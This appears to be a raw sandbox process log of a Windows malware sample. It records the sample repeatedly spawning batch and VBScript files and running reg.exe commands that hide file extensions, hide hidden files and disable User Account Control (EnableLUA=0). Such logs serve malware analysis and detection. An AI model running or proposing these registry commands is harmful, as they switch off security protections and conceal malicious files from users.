C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\FOEQUMAg.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\kMAcYkAU.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\OmQssEQc.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\aKsUosgo.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\WWockgsI.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\XeUokUIo.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\VGwgMcss.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\VegEEAEU.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nmgEcEwc.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\gAYQksQY.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\GcIMgAQE.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\egswIwMI.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\qkgEIMYQ.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\lKIAUcIM.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\LSwAokQw.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\PGsoQQwk.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\vCQIYYso.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\hMQooQME.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\icwsEsIg.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\gYwwEYMo.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\eocsgEQQ.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\MUMAIIEc.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\HgoUssQg.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\VYckMYUE.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
